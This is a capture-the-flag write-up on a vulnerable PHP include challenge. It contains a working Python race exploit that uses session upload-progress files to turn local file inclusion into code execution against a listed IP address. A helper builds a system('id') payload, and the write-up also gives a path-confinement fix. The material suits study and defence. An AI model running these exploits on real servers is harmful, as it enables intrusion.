<?php
highlight_file(__FILE__);
echo "your flag is in some file in /etc ";
$fielf=$_POST["field"];
$cf="/tmp/app_auth/cfile/".$_POST['cf'];
if(file_exists($cf)){
    include $cf;
    echo $$field;
    exit;
}else{
    echo "";
    exit;
}
?>

your flag is in some file in /etc
At first I thought the challenge author had simply misspelled the variable name, but it was never corrected for a long time, and people were still solving it. After staring at it for ages all I could see was a single arbitrary file read vulnerability; I assumed scanning wasn't allowed, so I didn't try it, and for a while I was completely stuck.
Later I tried running a scan, and it turned up you_can_seeeeeeee_me.php, which on visiting turned out to be phpinfo output. Going through the information piece by piece, I eventually spotted session.save_path=/var/lib/php/sessions/caefcfedje. Combined with the include in the source, this looked like the exploitable point. I found a script online and got command execution:
import io
import sys
import requests
import threading

sessid = 'Qftm'
url = 'http://124.70.48.235:20781/'

# Flag file path used by the script.
flag_path = '/etc/fifeahbegc/hbcceebeje/dhdcbbdjcd/babeechfba/fifhdabccd/fl444444g'
payload = "<?php var_dump(file_get_contents('%s'));?>" % flag_path

# Traversal from the include prefix /tmp/app_auth/cfile/ to the session file
# (extra ../ segments are harmless once the root is reached).
session_file = f"../../../../../../../../var/lib/php/sessions/caefcfedje/sess_{sessid}"


def POST(session):
    # Keep uploading so that PHP keeps writing the upload-progress entry, whose
    # key contains our payload, into sess_<PHPSESSID>. The entry is removed
    # again as soon as each upload completes, hence the race.
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(url,
                     data={"PHP_SESSION_UPLOAD_PROGRESS": payload},
                     files={"file": ('q.txt', f)},
                     cookies={'PHPSESSID': sessid})


def READ(session):
    # Hit the include repeatedly until it lands on the session file while it
    # still exists. The included session data begins with "upload_progress_",
    # so that marker in the response means the include won the race and the
    # payload has run.
    while True:
        response = session.post(url, data={"cf": session_file})
        if 'upload_progress_' not in response.text:
            print('[+++]retry')
            continue
        print(response.text)
        sys.exit(0)


with requests.Session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()
    READ(session)
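The script above works because three things line up: the include prefix /tmp/app_auth/cfile/ can be escaped with ../, PHP writes the user-controlled PHP_SESSION_UPLOAD_PROGRESS value verbatim into sess_&lt;PHPSESSID&gt; under session.save_path while an upload is in flight, and including that file executes whatever PHP tags it contains. The following Python is an added example, not the writeup's script and not the challenge code: it works each of those pieces out offline so they can be checked before firing requests at a target. Only the include prefix and the save path come from the page; the session-file layout is a constructed approximation of what PHP's upload-progress tracking writes, and is_confined is the path check the vulnerable include is missing.

```python
# Added example (not the writeup's script): the pieces of the
# session.upload_progress LFI race, worked offline.
import posixpath
import re
from typing import Optional

INCLUDE_BASE = "/tmp/app_auth/cfile/"             # from the challenge source
SESSION_DIR = "/var/lib/php/sessions/caefcfedje"  # from phpinfo() on the target
UPLOAD_PREFIX = "upload_progress_"                 # PHP default session.upload_progress.prefix


def traversal_to(include_base: str, target: str) -> str:
    """Minimal '../' chain that escapes include_base and lands on target.

    Both arguments are absolute POSIX paths. Extra '../' segments are harmless
    ('/..' at the root stays at the root), which is why the original script
    could get away with eight of them; this computes the exact count.
    """
    base_parts = [p for p in posixpath.normpath(include_base).split("/") if p]
    return "../" * len(base_parts) + target.lstrip("/")


def session_file_path(session_dir: str, sessid: str) -> str:
    """File-backed PHP sessions live at <save_path>/sess_<PHPSESSID>."""
    return posixpath.join(session_dir, "sess_" + sessid)


def build_session_blob(payload: str, filename: str = "q.txt", size: int = 1024 * 50) -> str:
    """Constructed approximation (not captured from PHP) of the session file
    contents while an upload with PHP_SESSION_UPLOAD_PROGRESS is in progress.
    The user-supplied key name lands in the file unescaped, which is what
    makes `include` execute it.
    """
    files = (
        'a:1:{i:0;a:5:{s:10:"field_name";s:4:"file";s:4:"name";s:%d:"%s";'
        's:8:"tmp_name";N;s:5:"error";i:0;s:4:"done";b:0;}}' % (len(filename), filename)
    )
    data = (
        'a:5:{s:10:"start_time";i:0;s:14:"content_length";i:%d;'
        's:15:"bytes_processed";i:0;s:4:"done";b:0;s:5:"files";%s}' % (size, files)
    )
    return UPLOAD_PREFIX + payload + "|" + data


def race_won(response_text: str) -> Optional[str]:
    """None if the include missed (file_exists() failed, only the highlighted
    source came back). Otherwise the string var_dump() printed, or "" when the
    include hit but the payload yielded no string (e.g. bool(false) because
    file_get_contents() failed). The marker works because PHP echoes the text
    outside the <?php ?> tags when it includes the session file.
    """
    if UPLOAD_PREFIX not in response_text:
        return None
    m = re.search(r'string\(\d+\) "(.*?)"', response_text, re.S)
    return m.group(1) if m else ""


def is_confined(include_base: str, user_value: str) -> bool:
    """The check the challenge lacks: after normalisation the resolved path must
    still sit under include_base. Server-side, PHP's realpath() plus a prefix
    test, or basename() on the user value, does the same job.
    """
    base = posixpath.normpath(include_base)
    resolved = posixpath.normpath(posixpath.join(base, user_value))
    return resolved == base or resolved.startswith(base + "/")


if __name__ == "__main__":
    sessid = "Qftm"
    cf = traversal_to(INCLUDE_BASE, session_file_path(SESSION_DIR, sessid))
    print("cf =", cf)
    print(build_session_blob("<?php system('id'); ?>"))
    print("confined?", is_confined(INCLUDE_BASE, cf))
```

race_won is the condition the exploit loop should spin on: a response without the upload_progress_ marker is a lost race and should be retried, not printed, and an empty string back means the include hit but the path handed to file_get_contents was wrong.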
